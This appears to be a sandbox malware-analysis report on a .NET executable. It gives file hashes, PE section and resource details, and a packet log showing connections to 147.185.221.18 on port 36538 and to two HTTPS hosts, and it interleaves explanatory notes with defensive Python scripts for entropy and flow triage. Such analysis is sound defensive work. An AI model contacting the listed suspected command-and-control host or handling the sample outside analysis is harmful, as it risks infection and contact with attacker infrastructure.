SHA1:F9C130589F8A2239756991289C161134B6FEB765
SHA-256:0BDE4AF03EA231681014BD2A9D730B46563AD4780305712433FD2C8A9EE4B2DA
SHA-512:55CEEFE63377CF46BC9AD4727F2A0258F488240A493FDE866E29F1488E7E3B11E6BD614326E63E389895875EEC9A89E0B997DE589B91043471BAD1D649341948
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):82176
Entropy (8bit):4.417316116559936
Encrypted:false
SSDEEP:384:ZFRXnVWBwB3+AFRXnVWBwB3+wtLzfrEdI74mjo6bPwtrQMUU5963XRs+5dXNlZn1:zESEuGi0tJaN3HpRAtFzELQ4
MD5:DE68791DB4CE60CB197725337EFE6596
SHA1:C7F5BBC3E92F7135240F4734EAC411F5202F64C0
SHA-256:5A5BDAB8F0F1F0FB044BA4E5EA1936640646CE7E5BB0FB4BB8F2818C322E3B8A
SHA-512:E31EAD28D43B4F9BFF66005AC0466825C70E98A9E9C0B6339E0448EA63A1D6C7776ED5FD34BACDC163BCF6F1A18B0EA29119CB343402B2BDA3B6A96908A793BA
Malicious:false
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                                                                                              Entropy (8bit):4.416700353481133
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:Vcifpi6ceLPL9skLmb0mKSWSPtaJG8nAgex285i2MMhA20X4WABlGuNU5+:yi58KSWIZBk2MM6AFBuo
                                                                                                                                                                                                                                              MD5:472932025148C60D26B2EF3B9646DFFD
                                                                                                                                                                                                                                              SHA1:7F49BDF1B8F7485767E6EF64CDDED4A58D928F88
                                                                                                                                                                                                                                              SHA-256:0899DA1642F33DEDD985251D82829F1394628D5315C247AF5C10E4F7CF1EF68E
                                                                                                                                                                                                                                              SHA-512:7D0D74A4F7CC13B4DA282700FEEB3EDBBB0AB335099E1A5BCC2F0F59046E945B7902B564EB31108998BA5AF12ADF1D48EE660760683C8F9A6F5DB0AF63B416DF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...u..................................................................................................................................................................................................................................................................................................................................................A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):4.641008170456594
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                              File name:r8k29DBraE.exe
                                                                                                                                                                                                                                              File size:571'904 bytes
                                                                                                                                                                                                                                              MD5:dc50baff9f1bab10f1ebc24e0d77afc3
                                                                                                                                                                                                                                              SHA1:29f4429939e57666b8a57c2d7b95a4801fa7ca20
                                                                                                                                                                                                                                              SHA256:03c95970bb3d91530aa29f9199ac1b2d7082672909e9c1a30804f99ebc9643b7
                                                                                                                                                                                                                                              SHA512:6249ae2e738515d2f453310ad8e9730334997796477f88f0e1a72086154b0348b07da7c651b835f8e8b84ac43452fd0d87b5c40400d8a9a6297e802ae045a152
                                                                                                                                                                                                                                              SSDEEP:6144:mujuIGjAOphSW579i8fB106f91hYC1l+W8GSAZ2nxKdn3wGK570:LRaAODHVrB/lDH8gZhdAY
                                                                                                                                                                                                                                              TLSH:10C4AD143268FA73D45D7ABDC802F65007746E113ED2D5B639787BBE1E32ADB46032A2
                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S._..........."...0.............n.... ... ....@.. ....................................`................................
                                                                                                                                                                                                                                              Icon Hash:17294d52534d5270
                                                                                                                                                                                                                                              Entrypoint:0x431c6e
                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0xDB5F1B53 [Sat Aug 17 17:20:19 2086 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
add byte ptr [eax], al
(the same instruction repeats 40 times in this stretch of the listing: the bytes here are 00 00, which disassemble to add byte ptr [eax], al, so the region is zero padding rather than code)
Name                                   Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT           0x31c14          0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE         0x32000          0x5b6c5       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC        0x8e000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG            0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0              0x0

The populated COM_DESCRIPTOR entry (0x48 bytes, the size of IMAGE_COR20_HEADER) is the CLR header, which is what makes this file a .NET assembly; the 8-byte IAT holds a single import thunk plus its null terminator. The SECURITY directory is empty, so the file carries no Authenticode signature, and there is no TLS, DEBUG or LOAD_CONFIG data.
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity       File Type  Entropy              Characteristics
.text   0x2000           0x2fc74       0x2fe00   51486e0d4be29e334b3561dcf0bdf96d  False     0.8480030189295039    data       7.739802708970689    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x32000          0x5b6c5       0x5b800   21da889dcdf6a6e55a63a508de6a660e  False     0.048582650273224046  data       2.056326055038315    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x8e000          0xc           0x200     7abbba69a828c23cc023fde0da5fb353  False     0.044921875           data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

.text has an entropy of 7.74 bits per byte and a ZLIB complexity of 0.85, so it is almost incompressible. Compiled IL plus metadata in a .NET assembly does not reach that figure; an executable section this dense is carrying compressed or encrypted data, which in a managed binary usually means an embedded payload that is decoded and loaded at run time. .rsrc (entropy 2.06, ZLIB complexity 0.05) is mostly flat icon bitmap data and compresses easily.
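The section figures above (virtual address and sizes, MD5, entropy, ZLIB complexity, characteristics) can be reproduced from the raw file with a short header walk. The following is an added example, not Joe Sandbox code and not taken from the sample: it parses the section table of a PE, computes the same metrics, and flags executable sections whose entropy is high enough to indicate a packed or encrypted payload. The PE it runs on is a constructed two-section skeleton built in build_sample_pe(), and the assumption that "ZLIB Complexity" means compressed size divided by raw size is marked in the code.

```python
import hashlib
import math
import struct
import zlib

# Section characteristic flags from winnt.h.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000

SECTION_HEADER = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data):
    """Shannon entropy in bits per byte: 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_complexity(data):
    """zlib-compressed size divided by raw size. Assumption: this is what the
    'ZLIB Complexity' column measures; a value near 1.0 means the bytes are
    already compressed or encrypted."""
    return len(zlib.compress(data, 9)) / len(data) if data else 0.0


def parse_sections(pe):
    """Walk MZ header -> e_lfanew -> PE signature -> COFF header -> section headers
    and return one dict per section with the figures the report table shows."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not at e_lfanew")
    coff = e_lfanew + 4
    number_of_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_of_optional_header = struct.unpack_from("<H", pe, coff + 16)[0]
    first_section = coff + 20 + size_of_optional_header
    sections = []
    for i in range(number_of_sections):
        (name, vsize, va, raw_size, raw_ptr, _relocs, _lines, _nrelocs, _nlines,
         chars) = struct.unpack_from(SECTION_HEADER, pe, first_section + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize, "raw_size": raw_size,
            "md5": hashlib.md5(raw).hexdigest(),
            "entropy": shannon_entropy(raw),
            "zlib_complexity": zlib_complexity(raw),
            "characteristics": chars,
        })
    return sections


def looks_packed(sections, entropy_threshold=7.0):
    """Names of executable sections at or above the entropy threshold. Compiled
    code (native, or IL plus metadata) normally sits well below 7 bits per byte;
    an executable section near 8 is carrying compressed or encrypted data."""
    return [s["name"] for s in sections
            if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE
            and s["entropy"] >= entropy_threshold]


def build_sample_pe():
    """Constructed PE32 skeleton for the demo (not the analysed sample): an
    executable .text of hash-chain bytes standing in for an encrypted payload,
    and a .rsrc that is almost entirely zeros."""
    text = hashlib.sha256(b"constructed seed").digest()
    while len(text) < 0x2000:
        text += hashlib.sha256(text[-32:]).digest()
    rsrc = b"constructed resource blob".ljust(0x1000, b"\0")

    opt_size = 0xE0  # PE32 optional header, left zero-filled here
    file_align = 0x200
    header_bytes = 0x40 + 4 + 20 + opt_size + 40 * 2
    headers_end = -(-header_bytes // file_align) * file_align  # round up to alignment
    text_ptr, rsrc_ptr = headers_end, headers_end + len(text)

    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x0102)
    sec = struct.pack(SECTION_HEADER, b".text", len(text), 0x2000, len(text), text_ptr,
                      0, 0, 0, 0, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    sec += struct.pack(SECTION_HEADER, b".rsrc", len(rsrc), 0x4000, len(rsrc), rsrc_ptr,
                       0, 0, 0, 0, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ)
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt_size) + sec
    return image.ljust(headers_end, b"\0") + text + rsrc


if __name__ == "__main__":
    sections = parse_sections(build_sample_pe())
    for s in sections:
        print(f"{s['name']:<6} va=0x{s['virtual_address']:x} raw=0x{s['raw_size']:x} "
              f"md5={s['md5']} entropy={s['entropy']:.2f} zlib={s['zlib_complexity']:.3f}")
    print("packed candidates:", looks_packed(sections))
```

Run it against a real file by replacing build_sample_pe() with open(path, "rb").read(); the threshold of 7.0 is a triage heuristic, so treat a hit as a reason to look for an embedded payload, not as a verdict on its own.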
Name           RVA      Size     Type                                                                                                 Language  Country  ZLIB Complexity
RT_ICON        0x32220  0x42028  Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 2835 x 2835 px/m  -         -        0.030649909755303725
RT_ICON        0x74248  0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m      -         -        0.3617021276595745
RT_ICON        0x746b0  0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m      -         -        0.14076763485477178
RT_ICON        0x76c58  0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m      -         -        0.20309568480300189
RT_ICON        0x77d00  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m   -         -        0.055675499822548206
RT_ICON        0x88528  0x4228   Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m    -         -        0.10781766650921115
RT_GROUP_ICON  0x8c750  0x5a     data                                                                                                 -         -        0.7555555555555555
RT_VERSION     0x8c7ac  0x31c    data                                                                                                 -         -        0.43090452261306533
RT_MANIFEST    0x8cac8  0xbfd    XML 1.0 document, Unicode text, UTF-8 (with BOM) text                                                -         -        0.4001303356142066

The six icon bitmaps add up to 0x5a530 bytes of the 0x5b6c5-byte resource section, which is why .rsrc as a whole has low entropy and compresses so well.
DLL          Import
mscoree.dll  _CorExeMain

This single native import is the standard CLR bootstrap of a .NET executable: the loader calls mscoree.dll!_CorExeMain, which reads the CLR header (the IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR entry at RVA 0x2008) and runs the managed entry point. The import table therefore says nothing about what the program does; its API use has to be recovered from the IL and metadata.
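The TCP packet list that follows is easier to read as connections than as individual packets. The following added example (not Joe Sandbox code) groups rows of that list into flows as seen from the analysis host, counts packets in each direction, measures each flow's duration, and flags server ports outside an assumed "ordinary" set. The rows in PACKETS are a subset copied from the packet table on this page; SANDBOX_IP is the analysis VM address that table shows, and EXPECTED_PORTS is an assumption for the demo.

```python
from collections import OrderedDict
from datetime import datetime

SANDBOX_IP = "192.168.2.7"          # analysis host, as seen in the packet table
EXPECTED_PORTS = {53, 80, 443}      # assumption: ports we treat as ordinary

# Subset of the report's packet table: (timestamp, src port, dst port, src ip, dst ip)
PACKETS = [
    ("Oct 15, 2024 11:20:27.189583063 CEST", 49731, 443, "192.168.2.7", "104.26.2.16"),
    ("Oct 15, 2024 11:20:27.189594984 CEST", 443, 49731, "104.26.2.16", "192.168.2.7"),
    ("Oct 15, 2024 11:20:27.189668894 CEST", 49731, 443, "192.168.2.7", "104.26.2.16"),
    ("Oct 15, 2024 11:20:28.482125044 CEST", 49740, 36538, "192.168.2.7", "147.185.221.18"),
    ("Oct 15, 2024 11:20:28.487030983 CEST", 36538, 49740, "147.185.221.18", "192.168.2.7"),
    ("Oct 15, 2024 11:20:28.487102032 CEST", 49740, 36538, "192.168.2.7", "147.185.221.18"),
    ("Oct 15, 2024 11:20:28.661955118 CEST", 49740, 36538, "192.168.2.7", "147.185.221.18"),
    ("Oct 15, 2024 11:20:28.667120934 CEST", 36538, 49740, "147.185.221.18", "192.168.2.7"),
    ("Oct 15, 2024 11:20:33.359874964 CEST", 49767, 443, "192.168.2.7", "169.197.85.95"),
    ("Oct 15, 2024 11:20:33.359895945 CEST", 443, 49767, "169.197.85.95", "192.168.2.7"),
    ("Oct 15, 2024 11:20:34.317600965 CEST", 49773, 443, "192.168.2.7", "169.197.85.95"),
    ("Oct 15, 2024 11:20:34.317653894 CEST", 443, 49773, "169.197.85.95", "192.168.2.7"),
]


def parse_ts(s):
    """'Oct 15, 2024 11:20:27.189583063 CEST' -> naive datetime. The report gives
    nanoseconds but datetime keeps microseconds, so the fraction is truncated to
    six digits; the zone label is dropped (all rows share it)."""
    body, _zone = s.rsplit(" ", 1)
    main, frac = body.split(".")
    return datetime.strptime(f"{main}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def build_flows(packets, client_ip=SANDBOX_IP):
    """Group packets by (client port, server ip, server port), with the analysis
    host as the client, and keep per-direction counts plus first/last times."""
    flows = OrderedDict()
    for ts, sport, dport, sip, dip in packets:
        if sip == client_ip:
            key, outbound = (sport, dip, dport), True
        elif dip == client_ip:
            key, outbound = (dport, sip, sport), False
        else:
            continue  # neither end is the analysis host; outside this view
        t = parse_ts(ts)
        f = flows.setdefault(key, {"client_port": key[0], "server_ip": key[1],
                                   "server_port": key[2], "out": 0, "in": 0,
                                   "first": t, "last": t})
        f["out" if outbound else "in"] += 1
        f["first"], f["last"] = min(f["first"], t), max(f["last"], t)
    return list(flows.values())


def duration_seconds(flow):
    return (flow["last"] - flow["first"]).total_seconds()


def unusual_ports(flows, expected=EXPECTED_PORTS):
    """(server ip, server port) for every flow whose server port is not expected."""
    return [(f["server_ip"], f["server_port"]) for f in flows
            if f["server_port"] not in expected]


if __name__ == "__main__":
    flows = build_flows(PACKETS)
    for f in flows:
        print(f"{SANDBOX_IP}:{f['client_port']} -> {f['server_ip']}:{f['server_port']}  "
              f"out={f['out']} in={f['in']} duration={duration_seconds(f):.3f}s")
    print("non-standard server ports:", unusual_ports(flows))
```

On the full table the same grouping shows which remote hosts the process talked to and for how long; the port filter is only a first cut, since a C2 channel can just as well sit on 443.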
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Oct 15, 2024 11:20:27.189583063 CEST  49731        443        192.168.2.7     104.26.2.16
Oct 15, 2024 11:20:27.189594984 CEST  443          49731      104.26.2.16     192.168.2.7
Oct 15, 2024 11:20:27.189668894 CEST  49731        443        192.168.2.7     104.26.2.16
Oct 15, 2024 11:20:27.244190931 CEST  49731        443        192.168.2.7     104.26.2.16
Oct 15, 2024 11:20:27.244205952 CEST  443          49731      104.26.2.16     192.168.2.7
Oct 15, 2024 11:20:27.892817020 CEST  443          49731      104.26.2.16     192.168.2.7
Oct 15, 2024 11:20:27.892894983 CEST  49731        443        192.168.2.7     104.26.2.16
Oct 15, 2024 11:20:27.901534081 CEST  49731        443        192.168.2.7     104.26.2.16
Oct 15, 2024 11:20:27.901547909 CEST  443          49731      104.26.2.16     192.168.2.7
Oct 15, 2024 11:20:27.902040958 CEST  443          49731      104.26.2.16     192.168.2.7
Oct 15, 2024 11:20:27.942365885 CEST  49731        443        192.168.2.7     104.26.2.16
Oct 15, 2024 11:20:27.966043949 CEST  49731        443        192.168.2.7     104.26.2.16
Oct 15, 2024 11:20:28.011401892 CEST  443          49731      104.26.2.16     192.168.2.7
Oct 15, 2024 11:20:28.293404102 CEST  443          49731      104.26.2.16     192.168.2.7
Oct 15, 2024 11:20:28.293487072 CEST  443          49731      104.26.2.16     192.168.2.7
Oct 15, 2024 11:20:28.293560982 CEST  49731        443        192.168.2.7     104.26.2.16
Oct 15, 2024 11:20:28.319114923 CEST  49731        443        192.168.2.7     104.26.2.16
Oct 15, 2024 11:20:28.482125044 CEST  49740        36538      192.168.2.7     147.185.221.18
Oct 15, 2024 11:20:28.487030983 CEST  36538        49740      147.185.221.18  192.168.2.7
Oct 15, 2024 11:20:28.487102032 CEST  49740        36538      192.168.2.7     147.185.221.18
Oct 15, 2024 11:20:28.661955118 CEST  49740        36538      192.168.2.7     147.185.221.18
Oct 15, 2024 11:20:28.667120934 CEST  36538        49740      147.185.221.18  192.168.2.7
Oct 15, 2024 11:20:33.359874964 CEST  49767        443        192.168.2.7     169.197.85.95
Oct 15, 2024 11:20:33.359895945 CEST  443          49767      169.197.85.95   192.168.2.7
Oct 15, 2024 11:20:33.359960079 CEST  49767        443        192.168.2.7     169.197.85.95
Oct 15, 2024 11:20:33.360724926 CEST  49767        443        192.168.2.7     169.197.85.95
Oct 15, 2024 11:20:33.360738039 CEST  443          49767      169.197.85.95   192.168.2.7
Oct 15, 2024 11:20:34.076546907 CEST  443          49767      169.197.85.95   192.168.2.7
Oct 15, 2024 11:20:34.076632977 CEST  49767        443        192.168.2.7     169.197.85.95
Oct 15, 2024 11:20:34.087690115 CEST  49767        443        192.168.2.7     169.197.85.95
Oct 15, 2024 11:20:34.087723017 CEST  443          49767      169.197.85.95   192.168.2.7
Oct 15, 2024 11:20:34.088017941 CEST  443          49767      169.197.85.95   192.168.2.7
Oct 15, 2024 11:20:34.102899075 CEST  49767        443        192.168.2.7     169.197.85.95
Oct 15, 2024 11:20:34.147416115 CEST  443          49767      169.197.85.95   192.168.2.7
Oct 15, 2024 11:20:34.306485891 CEST  443          49767      169.197.85.95   192.168.2.7
Oct 15, 2024 11:20:34.306550026 CEST  443          49767      169.197.85.95   192.168.2.7
Oct 15, 2024 11:20:34.306602001 CEST  49767        443        192.168.2.7     169.197.85.95
Oct 15, 2024 11:20:34.317085981 CEST  49767        443        192.168.2.7     169.197.85.95
Oct 15, 2024 11:20:34.317106009 CEST  443          49767      169.197.85.95   192.168.2.7
Oct 15, 2024 11:20:34.317600965 CEST  49773        443        192.168.2.7     169.197.85.95
Oct 15, 2024 11:20:34.317653894 CEST  443          49773      169.197.85.95   192.168.2.7
Oct 15, 2024 11:20:34.318021059 CEST  49773        443        192.168.2.7     169.197.85.95
Oct 15, 2024 11:20:34.318303108 CEST  49773        443        192.168.2.7     169.197.85.95
Oct 15, 2024 11:20:34.318325996 CEST  443          49773      169.197.85.95   192.168.2.7
Oct 15, 2024 11:20:35.038033962 CEST  443          49773      169.197.85.95   192.168.2.7
Oct 15, 2024 11:20:35.045526981 CEST  49773        443        192.168.2.7     169.197.85.95
Oct 15, 2024 11:20:35.045552015 CEST  443          49773      169.197.85.95   192.168.2.7
Oct 15, 2024 11:20:35.248979092 CEST  443          49773      169.197.85.95   192.168.2.7
Oct 15, 2024 11:20:35.249027967 CEST  443          49773      169.197.85.95   192.168.2.7
Oct 15, 2024 11:20:35.249087095 CEST  49773        443        192.168.2.7     169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:35.289311886 CEST49773443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:35.289334059 CEST44349773169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:36.988104105 CEST3653849740147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:36.988181114 CEST4974036538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:37.068414927 CEST4974036538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:37.073350906 CEST3653849740147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:37.081928015 CEST4978436538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:37.086920023 CEST3653849784147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:37.086987972 CEST4978436538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:37.100087881 CEST4978436538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:37.105000973 CEST3653849784147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:37.417701960 CEST49790443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:37.417759895 CEST44349790169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:37.417828083 CEST49790443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:37.418154955 CEST49790443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:37.418171883 CEST44349790169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:38.198895931 CEST44349790169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:38.200347900 CEST49790443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:38.200361967 CEST44349790169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:38.408061981 CEST44349790169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:38.408122063 CEST44349790169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:38.408554077 CEST49790443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:38.408581972 CEST44349790169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:38.408596992 CEST49790443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:38.409508944 CEST49796443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:38.409558058 CEST44349796169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:38.410032988 CEST49796443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:38.410032988 CEST49796443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:38.410063982 CEST44349796169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:39.122108936 CEST44349796169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:39.145241022 CEST49796443192.168.2.7169.197.85.95
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:39.145265102 CEST44349796169.197.85.95192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:39.348665953 CEST44349796169.197.85.95192.168.2.7
